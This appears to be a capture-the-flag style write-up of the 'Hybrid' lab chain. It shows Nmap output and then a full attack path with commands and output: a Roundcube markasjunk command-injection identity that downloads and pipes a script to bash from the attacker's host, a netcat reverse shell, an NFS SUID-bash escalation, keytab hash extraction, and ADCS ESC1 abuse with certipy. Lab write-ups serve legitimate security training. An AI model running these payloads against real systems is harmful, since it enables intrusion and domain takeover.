Hybrid is a Chain mixed with a linux and windows machine. Starts off with Roundcube Webmail on http, using alias identities your able to force command injection leading to a reverse shell. The once on the box your find /etc/exports enabling rw for /opt/share, allowing for privilege escalation to user peter. Once done, you tunnel through to find a vulnerable ESC1 template allowing for Domain Computers to supply enrollees allowing for privilege escalation to Administrator.

Initial Nmap

Two IPs to scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
Nmap scan report for 10.10.160.197
Host is up (0.16s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-11 15:34:13Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-17T16:39:23
| Not valid after:  2025-07-17T16:39:23
| MD5:   4901:de71:cb50:f455:3fe3:23b1:2a87:0e2a
|_SHA-1: 74dc:f402:f306:04f6:c39f:fb8f:a1bf:f9f1:76e6:60a9
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-17T16:39:23
| Not valid after:  2025-07-17T16:39:23
| MD5:   4901:de71:cb50:f455:3fe3:23b1:2a87:0e2a
|_SHA-1: 74dc:f402:f306:04f6:c39f:fb8f:a1bf:f9f1:76e6:60a9
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-17T16:39:23
| Not valid after:  2025-07-17T16:39:23
| MD5:   4901:de71:cb50:f455:3fe3:23b1:2a87:0e2a
|_SHA-1: 74dc:f402:f306:04f6:c39f:fb8f:a1bf:f9f1:76e6:60a9
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-17T16:39:23
| Not valid after:  2025-07-17T16:39:23
| MD5:   4901:de71:cb50:f455:3fe3:23b1:2a87:0e2a
|_SHA-1: 74dc:f402:f306:04f6:c39f:fb8f:a1bf:f9f1:76e6:60a9
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: HYBRID
|   NetBIOS_Domain_Name: HYBRID
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hybrid.vl
|   DNS_Computer_Name: dc01.hybrid.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-11-11T15:36:56+00:00
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Issuer: commonName=dc01.hybrid.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-16T16:48:12
| Not valid after:  2025-01-15T16:48:12
| MD5:   d7ed:81b4:60b7:109f:56e3:7901:e081:2237
|_SHA-1: 95e3:a4cd:6bc8:3de4:cd9a:92c3:10e5:4e58:9951:81a4
|_ssl-date: 2024-11-11T15:37:36+00:00; 0s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-11-11T15:36:56
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 10.10.160.198
Host is up (0.16s latency).
Not shown: 990 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 60:bc:22:26:78:3c:b4:e0:6b:ea:aa:1e:c1:62:5d:de (ECDSA)
|_  256 a3:b5:d8:61:06:e6:3a:41:88:45:e3:52:03:d2:23:1b (ED25519)
25/tcp   open  smtp?
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Redirecting...
|_http-server-header: nginx/1.18.0 (Ubuntu)
110/tcp  open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after:  2033-06-14T13:20:17
| MD5:   3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
|_SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA UIDL SASL RESP-CODES STLS AUTH-RESP-CODE PIPELINING TOP
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35943/tcp6  mountd
|   100005  1,2,3      38361/tcp   mountd
|   100005  1,2,3      42047/udp   mountd
|   100005  1,2,3      55681/udp6  mountd
|   100021  1,3,4      32856/udp   nlockmgr
|   100021  1,3,4      36789/tcp6  nlockmgr
|   100021  1,3,4      37737/tcp   nlockmgr
|   100021  1,3,4      60997/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
143/tcp  open  imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: more post-login LOGIN-REFERRALS OK LITERAL+ IDLE IMAP4rev1 capabilities SASL-IR ID ENABLE have Pre-login LOGINDISABLEDA0001 listed STARTTLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after:  2033-06-14T13:20:17
| MD5:   3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
|_SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
587/tcp  open  submission?
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: more post-login LOGIN-REFERRALS OK LITERAL+ IDLE IMAP4rev1 AUTH=LOGINA0001 SASL-IR AUTH=PLAIN ENABLE have capabilities Pre-login listed ID
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after:  2033-06-14T13:20:17
| MD5:   3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
|_SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
995/tcp  open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL(PLAIN LOGIN) RESP-CODES USER AUTH-RESP-CODE PIPELINING TOP
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after:  2033-06-14T13:20:17
| MD5:   3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
|_SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
|_ssl-date: TLS randomness does not represent time
2049/tcp open  nfs_acl     3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have two targets, lets focus on the linux machine first since the other is unreachable.

HTTP

Going to the IP address redirectes us to mail01.hybrid.vl and looks to be Roundcube Webmail. Not much we can do at the moment. We’ll come back πŸ‘.

NFS

We did have a port 2049 NFS open we can check.

1
2
3
$ showmount -e 10.10.168.102
Export list for 10.10.168.102:
/opt/share *

Mounting to it we see backup.tar.gz. We copy it and unzip to find some configs and other directorys.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ sudo mount.nfs -o rw 10.10.139.134:/opt/share tmpMnt/ 

$ tree backup             
backup
β”œβ”€β”€ backup.tar.gz
β”œβ”€β”€ etc
β”‚Β Β  β”œβ”€β”€ dovecot
β”‚Β Β  β”‚Β Β  └── dovecot-users
β”‚Β Β  β”œβ”€β”€ passwd
β”‚Β Β  β”œβ”€β”€ postfix
β”‚Β Β  β”‚Β Β  └── main.cf
β”‚Β Β  └── sssd
β”‚Β Β      └── sssd.conf
└── opt
    └── certs
        └── hybrid.vl
            β”œβ”€β”€ fullchain.pem
            └── privkey.pem

8 directories, 7 files


This reveals some users from the dovecot-users file.

1
2
admin@hybrid.vl:{plain}<SNIP>
peter.turner@hybrid.vl:{plain}<SNIP>

We can try these to login with RoundCube.

RoundCube Webmail

Using the credentials we’re able to login with both accounts. Looking at what version is installed we see more plugins install as well, one that sticks out is markasjunk.

We can look over this blog and see how it works. So simply, we need to use peter’s account to send and email to admin and receive a shell back.

We need to change his email a bit, or his identity, to peter.turner&curl${IFS}-o${IFS}/tmp/x${IFS}10.8.4.29/x${IFS}|${IFS}bash&@hybrid.vl.

Then we send an email to admin, select it, and mark as junk. Then watch the magic happen. πŸŽ‡βœ¨πŸŽ‡
(we hope) 🀨

1
2
3
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.168.102 - - [28/Apr/2025 14:03:22] "GET /x HTTP/1.1" 200 -

Hits us!!

1
2
3
4
5
6
7
8
$ nc -lvnp 900114:04:13 [14/27]
listening on [any] 9001 ...  
connect to [10.8.4.29] from (UNKNOWN) [10.10.168.102] 52370
bash: cannot set terminal process group (646): Inappropriate ioctl for device
bash: no job control in this shell
www-data@mail01:~/roundcube$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@mail01:~/roundcube$

We got our callback.

Shell as www-data

Checking the mysql config doesn’t yield much but the same users.

1
2
3
4
5
6
7
8
www-data@mail01:~/roundcube$ cat config/config.inc.php | grep -v '^//' | grep .
<?php
/* Local configuration for Roundcube Webmail */
$config['db_dsnw'] = 'mysql://roundcube:<SNIP>@localhost/roundcubemail';
$config['imap_host'] = 'localhost:143';
$config['support_url'] = '';
$config['des_key'] = 'RpiHQJt10wGZdlMAU9CnBPfc';
$config['plugins'] = ["markasjunk"];

Since the NFS was running we can check its configs at /etc/exports. Which yields the follwing:

1
2
3
4
5
6
7
8
9
10
11
12
$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/opt/share *(rw,no_subtree_check)

This is a good one!!! Basically, we can copy the systems /bin/bash to /opt/share(your machines /bin/bash might not work). Then create user peter with the same uid and give ownership of bash to peter and give it a stickybit. Execute on the victim machine.

We’re peter on the box!!✨✨

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
---VicMac--
$ cp /bin/bash /opt/share
$ id peter.turner@hybrid.vl
uid=<SNIP>(peter.turner@hybrid.vl) gid=<SNIP>(domain users@hybrid.vl) groups=<SNIP>(domain users@hybrid.vl),<SNIP>(hybridusers@hybrid.vl)
--AttMac--
$ useradd -u <SNIP> -r -s /bin/bash peter
$ su peter
$ cp /opt/share/bash .
$ chmod +s bash
$ cp bash /opt/share
--VicMac--
$ ./bash -p
bash-5.1$ id
uid=33(www-data) gid=33(www-data) euid=90<SNIP>(peter.turner@hybrid.vl) egid=992 groups=992,33(www-data)
bash-5.1$

We have euid of peter.turner, which means we can see his home directory now. His home directory contains passwords.kdbx, a KeePass Database. Getting this to our windows vm and looking at it it requires a password. We can try one of the passwords we found from the dovecot-users file, which gets is in.

Root Toot!!

Now we have his domain password, and if we try to simply ssh to the box with this password, we get a session. As a added bonus, we get root easily!!

1
2
3
4
5
6
7
8
9
10
11
12
13
$ ssh peter.turner@hybrid.vl@mail01.hybrid.vl          
(peter.turner@hybrid.vl@mail01.hybrid.vl) Password:

Last login: Mon Apr 28 23:17:53 2025 from 10.8.4.29
peter.turner@hybrid.vl@mail01:~$ sudo -l
[sudo] password for peter.turner@hybrid.vl: 
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User peter.turner@hybrid.vl may run the following commands on mail01:
    (ALL) ALL
peter.turner@hybrid.vl@mail01:~$ sudo su
root@mail01:/home/peter.turner@hybrid.vl#

Pivoting

Setting up a tunnel using chisel so we can continue our enumeration. After doing so, we get an bloodhound dump.

1
$ proxychains4 -q nxc ldap hybrid.vl -u peter.turner -p 'b0cwR+G4Dzl_rw' --dns-server 10.10.145.149 --bloodhound -c All

Long story short, peter didn’t have anything we could to our advantage.

Seeing as ADCS is running on the machine we can try there.

ADCS is my friend

Running certipy we find that this template is vulnerable to ESC1. 

1
2
3
4
$ proxychains4 -q certipy find -vulnerable -dc-ip 10.10.149.117 -u peter.turner@hybrid.vl -p <SNIP> -stdout -debug
<SNIP>
 [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

Yet we need a Domain Computer to do this, and we did have root on the MAIL01$ machine. We can get the keytab file for kerberos over to our machine and use keytabextract.py. 

1
2
3
4
5
6
7
8
9
10
$ keytabextract.py /home/jay/Documents/vl/chains/hybrid/krb5.keytab 
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HYBRID.VL
        SERVICE PRINCIPAL : MAIL01$/
        NTLM HASH : <SNIP>
        AES-256 HASH : <SNIP>
        AES-128 HASH : <SNIP>

PrivEsc

Now we can exploit ESC1 with a couple commands.

Firstly, we request with upn Administrator using the CA and the Template Name. This will give us a pfx file.

1
2
3
4
5
6
7
8
9
10
11
12
$ proxychains4 -q certipy req -dc-ip 10.10.149.117 -u 'MAIL01$@hybrid.vl' -hashes :<SNIP> -ca hybrid-DC01-CA -template HybridComputers -upn Administrator -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.149.117[\pipe\cert]                          
[+] Connected to endpoint: ncacn_np:10.10.149.117[\pipe\cert]
[*] Successfully requested certificate                                                         
[*] Request ID is 21
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID                                                              
[*] Saved certificate and private key to 'administrator.pfx'

Lastly, we authenticate with the pfx file. 

1
2
3
4
5
6
7
8
9
$ proxychains4 -q certipy auth -pfx administrator.pfx -domain hybrid.vl -dc-ip 10.10.149.117 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': <SNIP>